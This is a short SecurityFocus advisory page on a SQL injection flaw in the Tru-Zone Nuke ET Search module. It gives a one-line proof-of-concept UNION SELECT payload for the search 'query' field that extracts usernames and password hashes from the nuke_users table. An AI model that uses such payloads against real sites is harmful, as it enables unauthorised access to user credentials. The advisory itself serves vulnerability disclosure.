Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Tru-Zone Nuke ET Search Module SQL Injection Vulnerability

No exploit is required.

The following proof of concept is available:
Insert the following into the 'query' field of http://www.example.com/modules.php?name=Search:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*







 

Privacy Statement
Copyright 2009, SecurityFocus